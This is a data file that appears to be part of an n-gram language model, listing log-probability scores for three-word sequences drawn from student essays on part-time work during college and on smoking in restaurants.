-0.9656403 factors and decide
-1.5687287 experience to decide
-2.0076985 when they decide
-0.9707589 workplace , based
-1.6387053 or not based
-0.70521736 that theory based
-0.8181321 is purely based
-0.5414925 of formula based
-2.3714485 on the particulars
-1.765651 <s> I feel
-1.3498288 reasons I feel
-1.7713268 , I feel
-1.1296666 reason I feel
-0.96997774 opinion and feel
-1.2489028 many people feel
-2.1229439 that it allows
-1.5600914 , it allows
-1.2503052 Working part-time allows
-2.4240267 part-time job allows
-2.2440126 time job allows
-2.140444 <s> This allows
-2.0917118 <s> It allows
-0.7050885 a wage allows
-1.2585078 we will start
-2.4860063 students to start
-1.8083568 money to start
-0.96261126 '' to start
-1.886059 that they start
-1.7873074 when they start
-1.517268 before they start
-1.6471473 when we start
-0.7050885 a head start
-0.54140407 a smooth start
-0.8308522 living ; building
-0.8308522 basis ; building
-1.2702949 to start building
-0.97041446 building a strong
-1.5738872 , work ethic
-0.9509333 strong work ethic
-0.970309 expenditure and ease
-1.4536839 can help ease
-1.5831437 to help ease
-0.9693766 major in subjects
-2.3299065 on their subjects
-0.93046504 only academic subjects
-1.2234472 they can learn
-0.94442195 you can learn
-1.7066113 students will learn
-1.9111121 they will learn
-0.9698452 consequently , learn
-0.96817935 quicker and learn
-1.6284102 student to learn
-1.954911 students to learn
-1.2774061 begin to learn
-1.7172894 able to learn
-1.5689906 need to learn
-1.5729257 chance to learn
-1.506639 opportunity to learn
-1.3574245 ability to learn
-1.3574245 start to learn
-1.1514233 lessons to learn
-0.9070466 wisely to learn
-0.9070466 children to learn
-0.9070466 finished to learn
-0.9070466 women to learn
-2.2131567 , students learn
-1.2314063 will also learn
-0.8699339 They also learn
-0.8699339 Students also learn
-1.5302689 They should learn
-1.8799226 that they learn
-1.3376812 skills they learn
-1.3376812 Maybe they learn
-1.3678479 will better learn
-0.76420933 also must learn
-0.9251819 Students must learn
-0.76420933 she must learn
-1.1847069 ft really learn
-1.6788732 <s> Students learn
-1.6401705 when we learn
-1.2111412 many valuable lessons
-1.2058519 and financial lessons
-0.8443649 valuable practical lessons
-0.95659256 these important lessons
-0.8771001 and beneficial lessons
-1.6088461 of those lessons
-1.0172796 to attend lessons
-1.5537521 to be successful
-2.1461332 for a successful
-1.5485668 or a successful
-1.0924798 to build successful
-1.2704499 to start saving
-0.9698327 In a free
-0.8740446 that any free
-0.8740446 utilize any free
-1.2472482 spend their free
-0.95902205 enjoy their free
-0.9558945 depth study free
-0.77699226 have 2 free
-0.54140407 that single free
-1.7115754 students with structure
-2.0708947 how to divide
-1.6571755 jobs in areas
-1.8292053 in all areas
-0.7774487 from country areas
-0.9650539 references or contacts
-0.89685124 develop professional contacts
-0.87772065 valuable business contacts
-2.512545 it is best
-1.6230333 studying is best
-2.0157726 that the best
-2.0254824 is the best
-0.9620223 want the best
-1.2656678 is their best
-1.8479898 <s> The best
-2.4372787 the student intends
-0.9709693 intends to pursue
-2.2551448 can be exhausting
-1.9720926 However , let
-1.2645392 customers , let
-0.9653459 must not let
-1.7994487 studies and let
-1.9131018 chance to let
-1.6214783 we should let
-1.7023096 <s> And let
-0.9657641 where it becomes
-2.7413654 part-time job becomes
-0.9603899 <s> Time becomes
-0.94074243 the smoke becomes
-0.8186782 job becomes time-consuming
-1.6605414 College is stressful
-0.9652262 time-consuming or stressful
-0.96877724 keep their priorities
-0.5417812 their priorities straight
-0.96844935 workers that quit
-1.2444222 decide to quit
-0.9575645 harder to quit
-0.9575645 asked to quit
-1.406789 forced to quit
-1.8904092 they should quit
-0.84495735 most likely quit
-0.96781695 saying that rather
-2.5020983 is a rather
-1.3835106 time studying rather
-1.4135731 their jobs rather
-0.8871436 full potential rather
-1.1990498 for themselves rather
-0.93737245 in need rather
-1.0461817 in mind rather
-0.704702 poker players rather
-1.7381359 education , than
-1.185228 have less than
-1.6348169 during college than
-0.70418733 more competitive than
-1.4222882 a career than
-1.1458826 are more than
-0.56814647 spend more than
-0.819805 But more than
-0.819805 concentration more than
-1.401847 more important than
-0.11409575 that rather than
-0.11409575 studying rather than
-0.11409575 jobs rather than
-0.11409575 potential rather than
-0.11409575 themselves rather than
-0.11409575 need rather than
-0.11409575 mind rather than
-0.11409575 players rather than
-0.54078573 or specialisation than
-1.0759023 health problems than
-0.54078573 sadder story than
-0.54078573 larger possibility than
-1.6095899 in restaurants than
-2.661735 students to sacrifice
-1.6721942 rather than sacrifice
-0.97076845 Despite the risks
-0.93066055 proven health risks
-0.94384694 co-workers -LRB- though
-0.9448806 -LRB- even though
-0.8965667 of others though
-0.70521736 the risks though
-1.3940145 <s> Even though
-1.8836921 may be beneficial
-1.9193258 would be beneficial
-2.7282667 part-time job beneficial
-2.0118299 student is beneficial
-0.97055566 long-term , beneficial
-0.9694374 useful and beneficial
-1.9912884 , but beneficial
-0.7768402 be personally beneficial
-1.9153736 is to imply
-0.96518874 some it just
-0.968634 study is just
-1.8753234 is not just
-1.791681 should not just
-0.9665557 reports are just
-1.5151035 It fs just
-0.917614 many responsibilities just
-0.9211263 some income just
-0.54122734 have tried just
-1.0690506 little extra pocket
-0.80584294 gain extra pocket
-0.9652262 book or pocket
-0.92226976 spending : Some
-1.7405045 however , possible
-0.96229285 direct from possible
-0.9211172 focus as possible
-1.1764336 distractions as possible
-1.1764336 soon as possible
-1.6078688 at all possible
-2.0534644 <s> If possible
-1.2096395 is quite possible
-1.2927344 not always possible
-1.7418288 pay for those
-0.9458184 And for those
-0.9458184 smoke for those
-2.607604 , and those
-0.9323309 lives of those
-1.4329062 members of those
-1.1968336 right of those
-1.1968336 One of those
-1.1968336 efforts of those
-0.9323309 concerns of those
-0.96667266 comparison to those
-0.96667266 compared to those
-1.9379759 <s> For those
-1.2837069 for example those
-0.9614982 contact from those
-1.8612589 to help those
-0.8868216 are earning those
-0.9389058 specialisation than those
-0.7760808 significantly behind those
-0.540874 -LRB- Beware those
-0.970327 towards the final
-0.96824765 studying their final
-2.1427934 <s> This final
-1.5179671 of my final
-1.3643279 <s> My final
-1.6465164 money for years
-0.9016782 waste several years
-2.4792047 , the years
-1.2246704 The college years
-1.2246704 fs college years
-0.60818696 the final years
-0.60818696 their final years
-0.7038017 these precious years
-1.130547 in later years
-0.861359 last few years
-0.4694238 their four years
-0.4694238 these four years
-0.54052097 was 14 years
-0.7754742 next 3 years
-0.7038017 short 4 years
-0.54052097 their senior years
-0.54052097 finished 16 years
-0.7754742 around 40 years
-0.54052097 to 45 years
-1.2653071 law , medicine
-0.96822786 politics , medicine
-1.6614695 years of medicine
-0.96471906 claim with three
-1.9436862 <s> For three
-0.5436244 I have three
-1.1013486 the following three
-0.73452914 these following three
-2.2103217 There are three
-0.90312314 fll give three
-1.0172796 <s> Reason three
-1.7671621 is a lesson
-0.958312 useful life lesson
-2.0030637 they can before
-1.9519901 work , before
-0.96871805 circle and before
-1.6398749 of work before
-1.2293975 their work before
-0.9609232 saved money before
-1.3539121 extra-curricular activities before
-0.9570644 complicated life before
-0.8627178 never used before
-0.8171302 well-rounded lifestyle before
-0.8870965 a year before
-0.9312865 few years before
-1.8485878 is to enter
-2.12691 have to enter
-0.9628405 wants to enter
-1.7884638 when they enter
-1.4344765 once they enter
-1.518025 before they enter
-0.8774813 new graduates enter
-1.6489092 when we enter
-0.94926876 making it taste
-1.4889755 makes it taste
-2.068489 get a taste
-1.2631534 enjoy the taste
-0.96713984 alters the taste
-1.5454549 their first taste
-1.4303986 It can come
-1.9099971 is to come
-1.2646344 ; students come
-0.9570584 that may come
-1.7942575 students who come
-0.95512146 That would come
-0.7768402 reckoning shall come
-1.803115 job and manage
-2.39747 able to manage
-0.8502425 learning to manage
-1.539588 do n't manage
-0.9678614 manage to secure
-0.9678614 hopes to secure
-2.0018044 that it means
-1.1831028 if it means
-0.73083824 what it means
-1.9546864 have the means
-0.96597487 then have means
-0.94977397 `` which means
-0.5414925 <s> Independent means
-2.1276162 are not relying
-1.6721942 rather than relying
-0.9585228 supported by organizations
-0.96306306 support from organizations
-1.7823436 the world lying
-0.54166937 world lying beyond
-0.7054753 new worlds beyond
-0.54166937 <s> Anything beyond
-1.7780188 the college gates
-2.3770523 a student outside
-2.3117998 part-time jobs outside
-0.95834094 with an outside
-1.6135128 social skills outside
-1.1169219 be learned outside
-1.4102702 with people outside
-1.6171986 of life outside
-0.9247135 those living outside
-0.8624685 to live outside
-0.77661157 student opinions outside
-0.9473217 immediate social circles
-0.9649377 universities will meet
-0.96979755 circles and meet
-2.4032547 students to meet
-2.0597405 have to meet
-1.7298238 opportunity to meet
-1.244203 just to meet
-1.9707899 student fs meet
-0.5414925 would undoubtedly meet
-0.964565 entering a new
-1.2580774 creating a new
-2.5949848 of the new
-0.9660607 become the new
-2.1288831 <s> This new
-0.75286186 understanding something new
-0.75286186 want something new
-0.9419689 time learning new
-0.8760961 To explore new
-0.7118446 and meet new
-0.94232285 to meet new
-0.77623254 could discover new
-0.9328868 , our new
-0.8173369 and creating new
-0.5409623 be encountering new
-0.96602863 money it offers
-1.2315707 that work offers
-1.8841059 part-time work offers
-1.890775 also be considered
-2.3865998 should be against
-0.970251 crisis , against
-0.8624685 am completely against
-0.95828134 of experience against
-0.9445638 than there against
-1.540733 it 's against
-0.6983757 I am against
-0.5410506 be considered against
-0.70457333 am absolutely against
-1.7330232 to smoke against
-0.92509264 heavy course load
-0.96616054 college work load
-1.2950244 a full load
-0.8422966 a heavy load
-2.0907428 will be much
-1.2624958 it that much
-2.3570333 is a much
-2.4968066 have a much
-1.8368138 student is much
-1.7211828 time is much
-0.949683 environment is much
-1.657977 classes , much
-0.9677806 concepts in much
-0.8924813 students as much
-0.8924813 put as much
-0.8924813 require as much
-0.8924813 learn as much
-0.77728224 also so much
-0.94425076 have so much
-0.77728224 learned so much
-0.77728224 because so much
-1.6314275 has become much
-1.1784327 work environment much
-1.4256423 jobs provide much
-1.0998782 <s> Too much
-0.75326735 is too much
-0.60630846 on too much
-0.60630846 parents too much
-0.60630846 If too much
-0.87516296 Japanese universities much
-0.7036732 makes dating much
-0.54043275 could stem much
-0.54043275 with cared much
-0.9577736 work may hinder
-1.5466845 more than hinder
-0.96840984 hinder their performance
-1.4930594 their academic performance
-0.5415809 in improved performance
-0.5415809 the efficient performance
-1.6525099 money for books
-1.44468 tuition , books
-2.1587815 to their books
-1.7854307 from their books
-0.962452 only from books
-0.81796503 obtaining needed books
-0.7050885 students purchase books
-2.094723 be a hindrance
-2.4024405 <s> I worked
-1.6347499 , I worked
-1.56327 discipline and worked
-0.95094866 and only worked
-0.96568465 parents have worked
-0.9436016 I myself worked
-0.7345763 I never worked
-0.9462086 have never worked
-0.9271512 world really worked
-1.2160836 drinking with my
-0.94269454 continued with my
-1.5704706 reasons for my
-1.7261014 pay for my
-0.94309974 enough for my
-2.439045 it is my
-2.052978 It is my
-1.2643021 said , my
-2.007056 <s> In my
-1.6873509 , in my
-0.9360457 so in my
-0.9360457 keep in my
-0.9360457 things in my
-1.373809 top of my
-1.3866109 one of my
-0.9455529 Some of my
-0.9455529 weeks of my
-0.9640207 importance to my
-1.5423869 start to my
-1.6068672 focus on my
-0.89001435 up on my
-1.310997 based on my
-0.89001435 back on my
-1.7287846 to pay my
-0.95852464 work or my
-0.94982773 following are my
-1.2295682 These are my
-0.91390693 enjoy taking my
-1.4741772 to put my
-1.5750062 , when my
-1.0436957 <s> Of my
-0.9211468 cover all my
-0.9211468 covered all my
-1.7063323 it fs my
-1.3604625 growing up my
-0.9328818 much about my
-0.7074367 that support my
-0.9552516 to support my
-0.7074367 shall support my
-0.8976074 myself worked my
-0.88319516 nor did my
-1.3304244 to balance my
-1.123929 I spent my
-1.3958049 I had my
-0.88247085 out spending my
-0.5388479 <s> During my
-0.5388479 to organize my
-0.8368516 , reduces my
-0.70136726 job throughout my
-0.70136726 still remember my
-0.70136726 disadvantage versus my
-0.5388479 will voice my
-0.5388479 seriously jeopardize my
-1.4619812 as I did
-0.9215383 like I did
-0.9215383 Perhaps I did
-0.9653459 had not did
-1.0915376 , nor did
-2.0917118 <s> It did
-0.8445425 degree certainly did
-0.81796503 I finally did
-2.1530933 <s> I really
-1.9238683 , I really
-0.9206844 could I really
-0.93895787 are often really
-1.5645849 hard to really
-0.9499581 people only really
-1.1390803 don ft really
-1.3736824 the food really
-0.9076451 did n't really
-0.95577973 There fs really
-1.4472752 I am really
-1.7677474 real world really
-0.9452042 have never really
-0.733959 could never really
-1.1411238 or she really
-0.9357073 right through until
-0.88775027 humble position until
-0.9216024 the way until
-0.7769962 not diligent until
-0.8177979 world h until
-0.34219918 can wait until
-0.34219918 to wait until
-0.9339082 or restaurants until
-1.0482398 the last weeks
-0.9446826 a lower workload
-0.9579728 when my workload
-1.5643476 <s> I was
-1.485258 , I was
-0.821154 college I was
-1.010323 : I was
-0.67054653 when I was
-1.1487457 because I was
-1.0975442 When I was
-1.4285897 If it was
-1.4405235 class and was
-1.4298608 and work was
-0.9493093 degree which was
-1.8653182 college education was
-0.7048308 my workload was
-0.9135421 and he was
-0.92548186 workload was huge
-2.0069602 they can go
-2.0894058 do not go
-0.9692575 things and go
-1.4632062 reasons to go
-1.3634865 it to go
-1.5362816 has to go
-1.9889746 able to go
-1.5491309 enough to go
-1.2141695 afford to go
-1.7524542 want to go
-0.9677842 why students go
-0.9469285 everywhere you go
-1.1796057 students must go
-0.8626441 workers must go
-0.8766697 will actually go
-0.96559507 Therefore I conclude
-0.9709195 like to conclude
-1.6219896 work part-time now
-0.96906173 Communication is now
-0.959694 Most people now
-0.70521736 I conclude now
-1.0777895 young adults now
-2.0994792 the student needs
-1.3917652 college student needs
-1.3115649 most cases needs
-0.6179717 their financial needs
-0.86294854 have different needs
-0.9269427 she really needs
-0.8441873 very basic needs
-1.765013 in Japan needs
-0.8441873 support his\/her needs
-2.1887593 with the costs
-2.3057199 , the costs
-1.9866488 of the costs
-1.2680655 benefits and costs
-0.94961387 because studying costs
-0.91394144 ever-increasing tuition costs
-0.7050885 ever increasing costs
-0.951495 good education costs
-0.9702419 To a certain
-2.0661583 <s> In certain
-0.9708217 leads to certain
-2.04629 <s> I understand
-2.0855575 do not understand
-1.648014 enough to understand
-0.96690404 h to understand
-1.7858365 help students understand
-1.4049987 I also understand
-0.9661646 do they understand
-0.6183546 will better understand
-0.9473955 and could understand
-1.3986168 students would understand
-0.895424 not fully understand
-0.45457235 for that matter
-2.531173 is a matter
-1.5577679 should spend every
-1.6119055 of people every
-1.1423458 <s> Not every
-0.92487025 like Japan every
-0.8964715 benefit me every
-1.2583088 family can afford
-1.6501087 can not afford
-0.94916594 could not afford
-1.7023263 able to afford
-1.8694725 to help afford
-1.3271807 I really afford
-0.8778863 can afford maintaining
-0.96877724 maintaining their son
-0.9653139 son or daughter
-2.4867222 able to dedicate
-0.86392206 to entirely dedicate
-0.94063544 may make him
-1.4932024 to support him
-0.34232748 to dedicate him
-0.34232748 entirely dedicate him
-1.0709139 to prepare him
-0.4538205 him or herself
-0.9307304 studies ; moreover
-1.6483059 reason for getting
-0.9679221 family is getting
-1.8586749 First , getting
-0.9683588 through and getting
-0.9564748 ways of getting
-0.9564748 responsibly of getting
-1.4037303 risk of getting
-0.9696556 comes to getting
-0.9613394 ranging from getting
-1.2601715 college are getting
-0.9374052 worried about getting
-1.6599497 rather than getting
-0.8433006 others though getting
-1.1304172 not just getting
-0.77592903 and essentially getting
-0.970158 higher and higher
-1.259375 cases of higher
-0.96522456 institutions of higher
-0.9253135 are getting higher
-0.96934706 period is extreme
-1.9030274 , in extreme
-0.897185 a rather extreme
-2.4765916 important for maturing
-0.9488822 course could consume
-2.8185043 of the momentum
-1.3827922 that could preciously
-2.2209737 There are innumerous
-0.4542107 know that hard
-2.164734 It is hard
-1.2663919 beyond the hard
-0.9697437 smart , hard
-2.5866687 , and hard
-2.182258 value of hard
-1.2408347 to study hard
-0.94821346 by studying hard
-0.8842865 work very hard
-0.8842865 worked very hard
-2.2825007 to work hard
-0.95162916 working so hard
-1.3550365 and how hard
-0.8164635 money demands hard
-0.8164635 it becomes hard
-0.92548573 often really hard
-1.2703568 let the so-called
-1.5622797 during their so-called
-0.96979755 there and back
-2.375778 they are back
-0.7771444 that giving back
-1.8605232 I think back
-0.5414925 to run back
-1.4436433 books and classrooms
-2.314604 to their classrooms
-1.9546864 by the lack
-1.9977528 lead to lack
-2.3051038 <s> The lack
-0.96676177 classrooms they lack
-0.964643 delay or lack
-0.97025436 impression of power
-1.4019995 the necessary power
-0.970705 power to concentrate
-2.0453026 students should concentrate
-1.5126889 we should concentrate
-1.3610439 student must concentrate
-0.86383766 and instead concentrate
-0.9585228 them by active
-1.2490816 take an active
-0.70563835 an active role
-1.5680019 up the process
-0.86376655 his\/her educational process
-1.2172534 the learning process
-0.95166093 fs some !
-0.9562895 agree more !
-0.8620951 your loans !
-0.8950865 say never !
-0.81679666 of labor !
-0.77592903 right soon !
-1.0036056 I wanted !
-1.0750585 bad habits !
-0.70418733 : wrong !
-0.54078573 I guess !
-0.81679666 done properly !
-0.54078573 <s> Never !
-0.54078573 , unite !
-1.4396083 only for resting
-0.9348925 see themselves acquiring
-0.88864374 acquiring knowledge exclusively
-1.438035 only for poor
-2.087338 be a poor
-1.8638264 First , poor
-1.8454288 from their poor
-0.7050885 also mean poor
-0.94361335 affordable then poor
-0.96934706 important is participation
-1.8055009 , then participation
-0.86376655 their poor participation
-1.2623075 no time dedicated
-1.8083861 <s> A solution
-0.7775762 rather extreme solution
-1.5220007 be more scholarships
-0.9703562 receive a government
-2.2101698 , the government
-2.3378284 of the government
-1.9232823 from the government
-0.9566298 namely the government
-1.2687647 least a system
-2.7886145 of the system
-0.5414925 monetary enslavement system
-0.7771444 the economic system
-0.5414925 national healthcare system
-2.4993913 , and allow
-1.4293842 fees and allow
-0.949929 income which allow
-1.4012885 that would allow
-0.87743556 would simply allow
-0.9708217 her to practice
-0.59240544 put into practice
-0.87460804 classrooms into practice
-0.7054753 This whole practice
-2.0678182 <s> In comparison
-0.9694723 pales in comparison
-0.9434406 activities that young
-1.4691062 understand that young
-1.3681695 fact that young
-1.9697012 , a young
-2.011876 in a young
-1.984488 of a young
-1.4622189 from a young
-0.94137615 Should a young
-1.7770138 for the young
-1.9466602 college , young
-1.2067869 Too often young
-1.4016753 for many young
-1.1651682 that many young
-1.3628974 for any young
-0.9690737 applies to young
-0.9635135 influence on young
-0.94493 1 -RRB- young
-1.2879872 <s> Most young
-1.6971351 They are young
-0.9528733 shoppers are young
-0.88615644 part-time gives young
-1.4157193 will help young
-1.5735474 to help young
-0.9314969 know other young
-1.6656474 for all young
-2.0288048 <s> If young
-1.366492 will give young
-1.2250458 experience as adults
-1.7177081 well as adults
-0.8880774 become responsible adults
-0.87452316 , young adults
-1.0958514 are young adults
-0.8182215 , mature adults
-0.5414925 for younger adults
-2.0372965 <s> They tend
-1.0784609 young adults tend
-1.8474624 student is always
-1.4951766 money is always
-0.95104927 someone is always
-0.9464351 focus will always
-0.9464351 world will always
-1.7109442 is not always
-1.1829293 but not always
-1.1829293 's not always
-1.9731001 that students always
-1.6444814 and are always
-1.1542833 ca n't always
-1.0479476 I was always
-0.9653139 education or specialisation
-1.7852731 their college counterparts
-1.2709996 Generally , non
-2.1995287 have to adapt
-2.1114297 them to adapt
-2.4534755 in a relatively
-2.630871 to the relatively
-0.96844935 why that short
-1.3795258 a very short
-0.70534635 a relatively short
-0.5415809 , severely short
-2.0342643 be a problem
-2.2533517 of a problem
-0.9669855 week the problem
-0.9669855 aside the problem
-0.9707589 initiative , problem
-2.3051038 <s> The problem
-1.4044609 The main problem
-1.2558315 learning , since
-0.9634209 problem , since
-0.9634209 easier , since
-0.9657593 our work since
-0.88761127 to graduate since
-0.81792647 more wisely since
-0.92150915 every day since
-0.8444742 in clubs since
-0.8177979 rational approach since
-0.95863444 since this change
-2.057076 to a change
-1.5446997 This will change
-0.9703549 needing to change
-1.6166931 it may change
-0.70495963 -RRB- quickly change
-1.0051459 can easily change
-1.416526 is more manageable
-2.2938926 to be concerned
-0.970158 active and concerned
-2.074859 the work concerned
-0.9281723 usually less sophisticated
-1.5216873 be more sophisticated
-1.270913 them , whilst
-2.8064618 part time whilst
-0.70563835 time whilst furthering
-1.5322751 a valuable insight
-1.5653945 experience and insight
-1.2871864 the added insight
-0.5415809 of pecuniary insight
-0.93973964 insight about assimilation
-2.1505525 <s> This bridging
-2.1209922 is the effect
-1.2475339 have an effect
-0.8445425 The immediate effect
-0.54140407 This bridging effect
-0.54140407 a detrimental effect
-0.54140407 a definite effect
-2.7458208 part-time job enables
-0.96629435 we work enables
-0.93946695 effect better enables
-0.9473076 did -RRB- quickly
-0.84262145 to adapt quickly
-2.3159316 in their leap
-0.92226976 counter-argument : Working
-0.94926876 working it teaches
-1.5904769 because it teaches
-0.96997774 community and teaches
-2.8031495 part time teaches
-1.6538267 <s> It teaches
-0.968682 employment that theory
-2.814478 of the theory
-1.2649939 important that universities
-1.7982335 parents and universities
-1.6847119 can help universities
-0.9138709 most Japanese universities
-0.8449086 theory based universities
-0.8875358 most large universities
-0.70495963 most U.S. universities
-1.557113 student will likely
-0.94687754 possibilities will likely
-0.9277999 far less likely
-0.94690406 would most likely
-1.7113326 that are likely
-1.5929402 jobs are likely
-0.93973964 them about budgeting
-1.4847132 , work ethics
-1.32818 days work ethics
-0.92796654 Basic work ethics
-2.4236782 in a workplace
-1.5308905 In the workplace
-1.7190583 in the workplace
-1.9797235 of the workplace
-0.9701495 ethics , workplace
-1.438929 class and workplace
-1.5620195 variety of workplace
-0.96727586 into their workplace
-2.2802162 <s> The workplace
-0.8867519 ereal f workplace
-1.6845045 the future workplace
-0.77623254 build successful workplace
-1.1628797 to understand workplace
-1.270913 management , productivity
-0.970309 quality and productivity
-0.8453008 a practical manner
-0.9514415 on these issues
-0.9696175 issues and instead
-1.5391097 time working instead
-2.1208038 their studies instead
-0.88785994 for earning instead
-1.2327487 an education instead
-0.54140407 lucrative tips instead
-2.3714485 on the core
-0.97025436 image of material
-1.0861467 the course material
-0.8150853 core course material
-1.9789475 for their respective
-0.8426969 <s> We hope
-0.9687079 as their principle
-2.3173888 <s> The principle
-2.3635976 on the concern
-0.97001797 regardless of concern
-0.8635808 a major concern
-0.70534635 their principle concern
-1.5127802 , by definition
-0.9224694 then by definition
-0.9703562 train a worker
-1.6751995 a full-time worker
-1.2610804 So it follows
-1.7773734 dealing with problems
-1.2524239 have money problems
-0.8304509 any health problems
-0.8304509 to health problems
-0.5414925 more serious problems
-0.5414925 other respiratory problems
-2.5074086 it is perhaps
-0.96186733 Japan is perhaps
-0.9647839 income will perhaps
-1.4363422 is , perhaps
-0.96784025 Others , perhaps
-1.7278193 some students perhaps
-1.5439681 class or perhaps
-0.96692693 Some are perhaps
-1.7346755 become a fully
-2.0894058 do not fully
-1.2678394 efforts of fully
-1.569535 to become fully
-0.8701349 they become fully
-0.9640272 partly or fully
-2.363772 they are fully
-1.4131423 they graduate fully
-0.8873397 are perhaps fully
-1.7339616 students and families
-1.803518 with their families
-1.6200986 by their families
-0.94521844 assist their families
-1.3884045 and most families
-1.6961809 <s> Many families
-0.93747365 places where families
-0.5413157 from poorer families
-0.70495963 from wealthy families
-1.119492 , perhaps older
-1.2617884 , have saved
-2.1653402 in their courses
-0.9594985 before their courses
-0.54166937 of college-level courses
-0.54166937 them failing courses
-1.0065018 their courses began
-0.96537435 many will fall
-1.6496032 available to fall
-2.1107414 them to fall
-0.7776412 will fall somewhere
-0.96880597 somewhere in between
-0.7048308 middle ground between
-0.54122734 short span between
-0.9027323 right balance between
-1.2098205 to choose between
-0.8441873 a choice between
-0.54122734 is split between
-0.84159017 be divided between
-1.6395895 a little bit
-0.9703093 bit of book
-0.9683228 waters that hold
-0.93780583 gainful employment hold
-2.0663214 how to hold
-0.96187824 does working hold
-0.9619357 he should hold
-2.1560578 them to escape
-1.7510254 as an escape
-2.069276 from the confines
-1.2382638 and school worlds
-0.925402 explore new worlds
-2.296603 to be brought
-1.3827262 that has brought
-2.1833723 It is far
-1.6967614 from working far
-0.9058511 them so far
-0.9058511 go so far
-1.7206147 there are far
-0.8181321 you fre far
-2.1568217 them to dip
-0.96877724 dip their toes
-1.7421509 into the unfathomable
-0.5417812 the unfathomable waters
-1.134073 become fully immersed
-0.96822786 dormitories , preparing
-0.96822786 wisdom , preparing
-0.54174346 <s> Thereby preparing
-2.2509236 have to traverse
-1.251237 for the rest
-1.2634587 through the rest
-1.9140763 is to rest
-0.7774487 get proper rest
-1.2691678 enrich the lives
-0.9305558 that their lives
-1.8741325 in their lives
-1.3254359 of their lives
-2.0355797 on their lives
-0.45301723 their working lives
-0.9401783 people 's lives
-0.8430187 in our lives
-0.8430187 All our lives
-1.0471783 their daily lives
-0.96313107 Wages from gainful
-0.9703562 student a sample
-1.7896512 opportunity to sample
-1.5569246 ability to sample
-0.9708349 sample the delights
-0.93937266 they often want
-0.96757615 spoiled students want
-0.95661545 We may want
-0.91044164 but they want
-0.719741 what they want
-0.91044164 When they want
-0.91044164 anyway they want
-1.4913878 , you want
-0.9525968 non-smokers who want
-1.7332808 don ft want
-0.9440902 All parents want
-0.65153563 employer might want
-0.65153563 we might want
-0.9525061 whenever we want
-1.2642909 decide to try
-1.8968899 want to try
-1.2534233 and should try
-0.95377535 Those who try
-0.90151215 do several things
-1.2074438 many valuable things
-1.8003381 life , things
-0.62466204 learn many things
-1.5314252 <s> Such things
-1.4258283 and have things
-1.5564198 <s> These things
-0.9402063 more good things
-1.136229 many other things
-0.84119564 about other things
-0.90236163 learning difficult things
-0.8236918 do these things
-0.8236918 done these things
-0.8236918 appreciate these things
-0.94098914 try out things
-1.328932 for those things
-0.81267905 learning new things
-0.81267905 encountering new things
-0.54043275 many interesting things
-0.7753227 can buy things
-0.54043275 the obligatory things
-1.2838506 that were previously
-0.5417812 were previously unavailable
-0.8544539 a well rounded
-0.8544539 A well rounded
-1.1339254 become fully rounded
-2.153538 , it takes
-1.4992511 what it takes
-2.338211 a job takes
-2.1335695 a student takes
-1.9152932 college student takes
-1.3669456 , learning takes
-0.70521736 the side takes
-1.6421189 They will hopefully
-0.94714874 education will hopefully
-1.270913 expenses , hopefully
-2.087095 they will appreciate
-0.9696175 understand and appreciate
-1.8468289 is to appreciate
-2.2839632 able to appreciate
-1.4261363 likely to appreciate
-1.7885827 help students appreciate
-0.93883246 student better appreciate
-0.9438248 will hopefully appreciate
-2.3892295 they are paying
-1.7903471 for the next
-1.9156256 , to round
-0.84262145 the next round
-0.9703093 round of drinks
-0.970309 country and definitely
-0.9480326 should very definitely
-2.540267 , the harder
-0.95623523 them study harder
-0.94507897 that much harder
-0.90357953 and worked harder
-0.9650865 environment can suffer
-1.865048 learn to suffer
-1.2609593 And it wo
-0.9223168 selfish customers wo
-1.1561959 wo n't kill
-2.250717 can be fun
-1.4727278 and having fun
-2.4968479 to have fun
-2.1597657 students are mostly
-0.96979755 food and basic
-1.225114 the very basic
-2.1506422 to do basic
-0.5414925 are mostly basic
-0.5414925 of mastering basic
-2.5457652 , the simple
-0.970158 basic and simple
-1.4513023 , doing simple
-2.5348375 , the tasks
-1.0056605 even small tasks
-0.4701193 and simple tasks
-0.4701193 doing simple tasks
-0.5414925 and prioritize tasks
-0.8421199 to perform tasks
-0.9710474 dropped , suffering
-1.9545219 work and suffering
-0.97001797 virtues of labor
-0.96840984 shops their labor
-0.77729654 doing menial labor
-0.5415809 or manual labor
-0.909759 is n't fatal
-1.5272865 <s> But timing
-0.9653459 why not Japan
-0.86403596 study in Japan
-0.7389712 students in Japan
-1.4307592 work in Japan
-0.86403596 issue in Japan
-1.0785313 especially in Japan
-0.86403596 policy in Japan
-0.86403596 efforts in Japan
-0.86403596 Currently in Japan
-0.86403596 establishments in Japan
-0.86403596 restaurants in Japan
-0.42900413 smokers in Japan
-0.97047156 came to Japan
-0.9246755 society like Japan
-1.0054032 , including Japan
-1.8594404 students in America
-1.8920971 work in America
-0.34240606 in North America
-0.34240606 swept North America
-1.8973225 pay for rent
-2.540267 , the rent
-1.2649392 fees , rent
-0.9680422 books , rent
-0.5415809 my monthly rent
-1.7434075 people , married
-0.9534694 usually get married
-0.9632594 high-school student generally
-0.9694374 courting and generally
-2.0156863 part-time work generally
-2.1462479 students are generally
-1.7660506 in Japan generally
-0.9087888 young person generally
-0.966677 customers the freedom
-0.966677 wife the freedom
-0.97055566 are , freedom
-0.96892005 thinking in freedom
-1.5489037 taste of freedom
-0.96471596 sort of freedom
-1.5226834 to experience freedom
-0.9574894 little more freedom
-1.1416409 <s> With freedom
-1.5687809 In the sophomore
-0.94732565 So most sophomores
-1.9593399 by the 4th
-2.4505625 in a service
-0.7774487 , community service
-0.7774487 , customer service
-1.9779186 student fs prime
-2.1209922 is the purpose
-1.0436072 the main purpose
-1.0436072 The main purpose
-0.54140407 fs prime purpose
-0.54140407 the sole purpose
-1.0175442 the entire purpose
-0.54140407 the ultimate purpose
-0.5417812 <s> Cleaning toilets
-0.9653139 toilets or serving
-0.5417812 or serving burgers
-1.2592678 to not waste
-0.86302435 and completely waste
-0.9703549 apt to waste
-1.3029518 a real waste
-1.666686 rather than waste
-0.88761127 a complete waste
-0.5413157 <s> Why waste
-0.96347237 <s> I think
-1.4211972 , I think
-1.1343137 and I think
-0.7994673 so I think
-1.1038669 because I think
-0.97724015 which I think
-0.7994673 So I think
-1.0574335 When I think
-1.3443974 do not think
-2.1900768 have to think
-2.0280533 how to think
-1.4066516 I also think
-0.94711846 ft you think
-1.5233672 people who think
-1.140386 don ft think
-0.96829027 wanted for anything
-1.2699327 success , anything
-2.1465714 to do anything
-2.0534644 <s> If anything
-0.9526682 or get anything
-0.9426427 point learning anything
-0.949503 really learn anything
-1.2495443 Some people argue
-1.40211 students would argue
